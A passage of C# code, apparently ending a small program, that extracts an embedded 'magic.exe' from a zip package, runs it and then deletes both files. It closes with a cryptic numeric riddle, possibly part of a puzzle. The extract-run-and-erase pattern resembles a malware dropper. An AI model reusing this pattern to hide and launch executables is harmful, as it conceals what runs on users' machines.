Package pkgmain = ZipPackage.Open(dirx + kop + ".zip", FileMode.Open, FileAccess.Read);
Stream gh = pkgmain.GetPart(new Uri("/magic.exe", UriKind.Relative)).GetStream();
MemoryStream fsm = new MemoryStream();
int data;
int count = 0;
while ((data = gh.ReadByte()) != -1)
{
fsm.WriteByte((byte)data);
count += 1;
}
FileStream outStream = File.OpenWrite(dirx + kop + ".exe");
fsm.WriteTo(outStream);
outStream.Flush();
outStream.Close();
fsm.Close();
pkgmain.Close();
File.Delete(dirx + kop + ".zip");
Process.Start(dirx + kop + ".exe").WaitForExit();
File.Delete(dirx + kop + ".exe");
}
}
}
}
/////////////////////////////////
what will you do to 9968 to get 8966? SOOWAOD will lead you to your destiny..